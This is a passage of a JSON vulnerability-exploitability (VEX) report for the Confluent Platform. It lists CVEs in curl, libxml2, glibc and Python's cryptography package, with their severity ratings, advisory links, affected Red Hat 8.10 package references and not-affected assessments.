          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6653",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416,
        611
      ],
      "description": "Use After Free in libxml2's xmlParseInternalSubset from GNOME libxml2 version 2.9.11 to 2.11.0 allows a remote attacker to cause a denial-of-service via maliciously crafted XML input with improper entity resolution handling.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6653"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6653"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/2141260"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/work_items/1058"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6653"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8456-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6653"
        }
      ],
      "published": "2026-06-22T14:17:51+00:00",
      "updated": "2026-07-14T16:00:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6732",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        843
      ],
      "description": "A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6732"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11503"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6732"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461300"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1097"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6732"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6732"
        }
      ],
      "published": "2026-04-23T23:16:16+00:00",
      "updated": "2026-06-30T20:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6791",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        121
      ],
      "description": "When expanding paths that begin with a tilde (~) followed by a username, the internal parse_tilde function extracts the username to determine the user's home directory.  The implementation allocates memory for this username directly on the stack using the strndupa macro. Because the size of this allocation was determined by the length of the user-supplied input without any bounds checks, passing an excessively long username e.g. thousands of characters, forces the thread to exhaust its stack space. Thus if an application passes untrusted, attacker-controlled input to the wordexp function, an attacker can trigger a stack clash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6791"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6791"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6791"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34091"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6791"
        }
      ],
      "published": "2026-08-10T19:17:30+00:00",
      "updated": "2026-08-12T18:18:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69247",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        208,
        209
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.",
      "recommendation": "Upgrade cryptography to version 50.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69247"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/53fccd93413a8d7f07d6d8999681f27b75cffa3f"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/15369"
        },
        {
